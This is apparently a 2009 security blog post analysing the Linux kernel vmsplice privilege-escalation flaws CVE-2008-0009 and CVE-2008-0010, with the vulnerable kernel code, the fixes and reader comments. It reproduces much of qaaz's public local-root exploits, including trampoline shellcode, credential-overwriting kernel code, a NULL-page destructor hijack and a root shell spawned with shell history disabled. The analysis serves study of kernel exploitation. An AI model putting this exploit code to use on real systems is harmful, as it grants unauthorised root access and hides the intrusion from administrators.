xorl %eax, %eax

CVE-2008-0009/CVE-2008-0010: Linux kernel vmsplice(2) Privilege Escalation


Another post about _old_ but damn sexy kernel level vulnerabilities.
Both bugs were disclosed in February 2008 as 0day vulnerabilities with freaking awesome exploit codes by qaaz. Almost at the exact moment qaaz released his exploit codes, cliph of iSec.pl was publishing an advisory for the exact same vulnerabilities. I’m not going to attempt to find out what the relation between those two events might be since this is completely off topic.
So, the first bug (CVE-2008-0009) affects the 2.6.22 through 2.6.24 releases of the Linux kernel. Specifically, here is the susceptible code from 2.6.23’s fs/splice.c.

/*
 * For lack of a better implementation, implement vmsplice() to userspace
 * as a simple copy of the pipes pages to the user iov.
 */
static long vmsplice_to_user(struct file *file, const struct iovec __user *iov,
                             unsigned long nr_segs, unsigned int flags)
{
        struct pipe_inode_info *pipe;
        struct splice_desc sd;
        ssize_t size;
        int error;
        long ret;
   ...
                /*
                 * Get user address base and length for this iovec.
                 */
                error = get_user(base, &iov->iov_base);
                if (unlikely(error))
                        break;
                error = get_user(len, &iov->iov_len);
                if (unlikely(error))
                        break;

                /*
                 * Sanity check this iovec. 0 read succeeds.
                 */
                if (unlikely(!len))
                        break;
                if (unlikely(!base)) {
                        error = -EFAULT;
                        break;
                }

                sd.len = 0;
                sd.total_len = len;
                sd.flags = flags;
                sd.u.userptr = base;
                sd.pos = 0;

                size = __splice_from_pipe(pipe, &sd, pipe_to_user);
                if (size < 0) {
   ...
        return ret;
}

This code is part of the vmsplice(2) system call. As we can read from <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/vmsplice.2.html">its man page</a>, this system call was introduced in the 2.6.17 release of the Linux kernel and is used to map a user memory range into a pipe.
In the above code, we can see that it retrieves the contents of the user controlled iovec structure (the second argument of the system call) using get_user(), storing the values into 'base' and 'len' respectively. After that, some basic sanity checks take place: 'len' equal to zero and 'base' equal to NULL. The next part is really interesting: vmsplice_to_user() directly initializes the 'splice_desc' structure with the user controlled 'len' as 'total_len' and 'base' as 'userptr'. At last, it invokes __splice_from_pipe() to splice the data from 'pipe' as instructed by 'sd', using the 'pipe_to_user' handler routine. __splice_from_pipe() calls the handler routine (in this case pipe_to_user()) with no checks performed on the user controlled pointer passed to it. A quick look at pipe_to_user() reveals this:


static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf,
                        struct splice_desc *sd)
{
        char *src;
        int ret;
   ...
        /*
         * See if we can use the atomic maps, by prefaulting in the
         * pages and doing an atomic copy
         */
        if (!fault_in_pages_writeable(sd->u.userptr, sd->len)) {
                src = buf->ops->map(pipe, buf, 1);
                ret = __copy_to_user_inatomic(sd->u.userptr, src + buf->offset,
                                                        sd->len);
   ...
        return ret;
}

So basically, the user has complete control over this __copy_to_user_inatomic() call; since 'sd->u.userptr' is never validated, the kernel can be made to copy bytes from a pipe to an arbitrary address, including kernel memory. Of course, this does not sound so trivial to exploit. Here is what qaaz did in his fascinating diane_lane_fucked_hard.c code.

int	main(int argc, char *argv[])
{
	int		pi[2];
	long		addr;
	struct iovec	iov;

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	addr = get_target();
	printf("[+] addr: 0x%lx\n", addr);

So, he initializes ‘uid’ and ‘gid’ and if you’re already root it just exits with a message full of anger. :P
Otherwise, it calls get_target() to retrieve the location of the ‘sys_vm86old’ system call from /proc/kallsyms like that:

#define TARGET_PATTERN		" sys_vm86old"
     ...
long	get_target()
{
	FILE	*f;
	long	addr = 0;
	char	line[128];

	f = fopen("/proc/kallsyms", "r");
	if (!f) die("/proc/kallsyms", errno);

	while (fgets(line, sizeof(line), f)) {
		if (strstr(line, TARGET_PATTERN)) {
			addr = strtoul(line, NULL, 16);
			break;
		}
	}

	fclose(f);
	return addr;
}

After getting that address, it will move back to main() and execute this:

#define TRAMP_CODE		(void *) trampoline	
#define TRAMP_SIZE		( sizeof(trampoline) - 1 )

unsigned char trampoline[] =
"\x8b\x5c\x24\x04"		/* mov    0x4(%esp),%ebx	*/
"\x8b\x4c\x24\x08"		/* mov    0x8(%esp),%ecx	*/
"\x81\xfb\x69\x7a\x00\x00"	/* cmp    $31337,%ebx		*/
"\x75\x02"			/* jne    +2			*/
"\xff\xd1"			/* call   *%ecx			*/
"\xb8\xea\xff\xff\xff"		/* mov    $-EINVAL,%eax		*/
"\xc3"				/* ret				*/
;
     ...
	if (pipe(pi) < 0)
		die("pipe", errno);

	iov.iov_base = (void *) addr;
	iov.iov_len  = TRAMP_SIZE;

He initializes the pipe 'pi' using the equivalent system call, then sets the iovec's base address to that of sys_vm86old and its length to the trampoline's size. His trampoline code simply moves the first two arguments from the stack into EBX and ECX respectively, then compares EBX with 31337; if they are not equal it skips the call and returns -EINVAL, otherwise it first calls the function stored in ECX.
His code continues like this:

	write(pi[1], TRAMP_CODE, TRAMP_SIZE);
	_vmsplice(pi[0], &iov, 1, 0);

	gimmeroot();

He writes the above trampoline code into the pipe's write file descriptor, and then he calls _vmsplice() passing the pipe's read file descriptor, the iovec structure, 1 as the number of iovec ranges, and no flags. This writes the contents of TRAMP_CODE over the sys_vm86old system call's code, since this is where iov.iov_base points to!
And the awesomeness is not over yet...

#define TARGET_PATTERN		" sys_vm86old"
#define TARGET_SYSCALL		113
    ...
#define gimmeroot()		syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
    ...
void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}
}

gimmeroot() is a simple macro that calls sys_vm86old (syscall number 113 on i386) passing 31337 as its first argument and 'kernel_code' as its second. The trampoline code, which now sits at sys_vm86old's address, sees those arguments and invokes 'kernel_code', which is therefore executed in ring0.
Moving to kernel_code(), this is another cool piece of shellcode-like C. It retrieves the address of the current task's task_struct using get_current(), then scans it to find our UID and GID values, sets them to zero, and sets the three words following the next pointer (apparently the capability sets) to ~0. get_current() is simply:

static inline __attribute__((always_inline))
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

The final part of the main() function is quite obvious...

	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
	return 0;
}

Just spawn a bash root shell with history file linked to /dev/null.
The second vulnerability in cliph's advisory was in copy_from_user_mmap_sem(), which can also be found in fs/splice.c:

/*
 * Do a copy-from-user while holding the mmap_semaphore for reading, in a
 * manner safe from deadlocking with simultaneous mmap() (grabbing mmap_sem
 * for writing) and page faulting on the user memory pointed to by src.
 * This assumes that we will very rarely hit the partial != 0 path, or this
 * will not be a win.
 */
static int copy_from_user_mmap_sem(void *dst, const void __user *src, size_t n)
{
        int partial;

        pagefault_disable();
        partial = __copy_from_user_inatomic(dst, src, n);
        pagefault_enable();

        /*
         * Didn't copy everything, drop the mmap_sem and do a faulting copy
         */
        if (unlikely(partial)) {
                up_read(&current->mm->mmap_sem);
                partial = copy_from_user(dst, src, n);
                down_read(&current->mm->mmap_sem);
        }

        return partial;
}

Clearly, the user has almost complete control over the __copy_from_user_inatomic() call, since the ‘src’ pointer is not checked and can be set to any valid address. In his advisory, cliph states that this can lead to an indirect arbitrary read of kernel memory, but he was not sure whether it was exploitable or not. And here comes qaaz with his amazing jessica_biel_naked_in_my_bed.c code.
This vulnerability has been present since the introduction of the vmsplice(2) system call; consequently, it affects 2.6.17 up to 2.6.24.1. His code starts like this…

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};
    ...
int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

Once again, he gets his user’s IDs and checks that we are not already root on the system. He then initializes the first two elements of the ‘pages’ array; the compound literal trick reinterprets the two ints {0, PAGE_SIZE} as a pointer, which on 32-bit yields NULL for pages[0]. Then he does this:

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

Here is a simple allocation using the mmap(2) system call to allocate ‘map_size’ bytes starting at the pages[0] location (which is 0, meaning NULL). If the allocation fails it exits; otherwise, it does this:

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

So, it zeroes out the allocated space and informs the user about its location. Next, he sets the PG_compound flag, which is defined in include/linux/page-flags.h and is used to mark this page as part of a compound page. He also sets its ‘private’ field to the value of pages[0], its ‘count’ (which represents the usage count) to 1 and, finally, the next page’s LRU (Least Recently Used) list pointer to kernel_code()’s address; you’ll see at the end how cool this is.
His kernel_code() routine is almost identical to the one of the previous exploit as you can see here:

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

However, this code has support for both x86 and x86_64 as we can read from get_current() routine:

#if defined (__i386__)
    ...
static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)
    ...
static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

The only difference in retrieving the current task's task_struct on x86_64 is that you have to go through the GS segment, as you can see in the above code. In addition to this, kernel_code() invokes one more routine at the very end, named exit_kernel(). This is also written for both architectures like this:

#define STACK(x)	(x + sizeof(x) - 40)
    ...
char	exit_stack[1024 * 1024];
    ...
#if defined (__i386__)
    ...
#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
    ...
#elif defined (__x86_64__)
    ...
#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

What it does is store the user-mode segment selectors, flags, stack (exit_stack) and return address (exit_code) on the kernel stack and then trigger an interrupt return, to smoothly drop from kernel mode back to user mode. Now that the second page is initialized with an LRU next pointer to that code, the following code is executed:

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

pages[2] is read from the first word of the NULL mapping, i.e. the flags value just stored there (1 << PG_compound, which is 0x4000 on these kernels), and pages[3] is set to the page structure right after it. Another allocation then takes place at that address, the mapped area is zeroed out and the user is informed of the location of those pages. This page is now set up just like the first one:

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

Once again, the PG_compound flag of pages[2] is set, and pages[3]’s LRU next pointer is set to point to the kernel_code() function of the exploit code. A new allocation is made now…

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

This maps the page immediately after the one already mapped at pages[0]; on 32-bit, pages[4] is just PAGE_SIZE (0x1000), so mmap(2) returns a page that lies between the pages[0] and pages[2] mappings.

#define PIPE_BUFFERS	16
     ...
	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

The ‘map_size’ here covers three runs of PIPE_BUFFERS pages plus two extra pages. Then mmap(2) is called with a NULL hint; since that address is already mapped at pages[0], the kernel will place the mapping at some other location, and then the following happens:

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

This munmap() frees a single page near the end of the previously allocated buffer, punching a hole in it. Specifically, you can picture the allocations like this:

<pre>
   pages[0]         pages[1]         pages[2]       pages[3]
--------------   --------------   --------------  --------------
 from: 0          from: 0x20       from: 0x4000    from: 0x4020
 to:   0x1000     lru->next: kc    to:   0x5000    lru->next: kc
 PG_compound                       PG_compound


before memory unmap:

         pages[4]
      --------------
       from: 0xb7d97000
       to:   0xb7dc9000

unmap: 0xb7d97000 + 0x30000 (= 0xb7dc7000) up to 0xb7dc8000

After unmap:

         pages[4]
      --------------
       from: 0xb7d97000
       to:   0xb7dc7000

As well as page located at: 0xb7dc9000
</pre>

Now that memory is arranged, he creates the pipe pair and immediately closes the read file descriptor of the pipe like this:


	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

The iovec structure is initialized with the address of the last allocation (the pages[4] one), and its length is set to ULONG_MAX, i.e. 0xffffffff on 32-bit architectures. The final code is...

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}

exit_code() is installed as the handler for any SIGPIPE signal delivered to our process, and then the evil vmsplice(2) system call takes place. It requests the copy from 'map_addr', which reaches copy_from_user_mmap_sem() since this path takes the mmap_sem semaphore to stay safe against concurrent mmap(), exactly the situation created by the last mmap()/munmap() operations. However, since the read end of the pipe (the pi[0] file descriptor) is closed, a "broken pipe" (aka SIGPIPE) signal is sent to our process by the kernel, and during the release of the spliced pages the kernel indirectly calls lru->next, which now contains the address of the compound page's destructor.
This could be considered a kernel-mode .DTORS-like overwrite, since that destructor is invoked through put_page() when a page with the PG_compound flag is encountered. Normally, lru->next would point to a callback set by the allocator during initialization of the page, as we can read for the SLAB allocator in mm/slab.c:

static inline void page_set_cache(struct page *page, struct kmem_cache *cache)
{
        page->lru.next = (struct list_head *)cache;
}

But since qaaz set this pointer himself, during the deallocation of that page the following code from include/linux/mm.h will be executed:

static inline compound_page_dtor *get_compound_page_dtor(struct page *page)
{
        return (compound_page_dtor *)page[1].lru.next;
}

and this will be used by put_compound_page() of mm/swap.c like that:

static void put_compound_page(struct page *page)
{
        page = compound_head(page);
        if (put_page_testzero(page)) {
                compound_page_dtor *dtor;

                dtor = get_compound_page_dtor(page);
                (*dtor)(page);
        }
}

Because of this, freeing pages[0] and pages[2] results in (compound_page_dtor *)page[1].lru.next(page) and (compound_page_dtor *)page[3].lru.next(page) being invoked respectively. But this is exactly where kernel_code() resides!
After this executes, the exit_code() function is called. It is quite simple…

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

So, how did they patch(?) this?
This is a really nice question… ;P
After numerous failed attempts they came up with this patch:

  		}

+		if (unlikely(!access_ok(VERIFY_WRITE, base, len))) {
+			error = -EFAULT;
+			break;
+		}
+
  		sd.len = 0;

For vmsplice_to_user() and a similar one for copy_from_user_mmap_sem():

  	int partial;

+	if (!access_ok(VERIFY_READ, src, n))
+		return -EFAULT;
+
  	pagefault_disable();

As you may already know, access_ok() is a simple macro from arch/x86/include/asm/uaccess.h that uses __range_not_ok() to check that the whole range from src up to src+n lies within accessible user address space.
Tip: on x86 as well as x86_64 the first argument of access_ok() is completely ignored.
This is definitely one of those exploit codes that makes you wanna cry from emotion and wonder…

Written by xorl

August 10, 2009 at 09:02

Posted in linux, vulnerabilities

3 Responses


  1. Awesome analysis man! Post more exploit analysis plz :)

    thanasisk

    August 10, 2009 at 15:09

  2. Some classic information about this vulnerability, courtesy of the Hungarian:
    http://lwn.net/Articles/269532/

    spender

    August 10, 2009 at 15:21

  3. @thanasisk:
    I believe I should thanks 0x29A for his suggestion:
    https://xorl.wordpress.com/2009/07/18/linux-kernel-nvram-integer-overflow/#comment-303
    As well as nnp who “somewhere” said that it would be nice if I was writing about exploit codes too. Of course, I’ll only do this for public exploits. There will be no 0day in this blog :) never.

    ret I’m sorry for making you angry with these posts :P

    xorl

    August 10, 2009 at 15:31

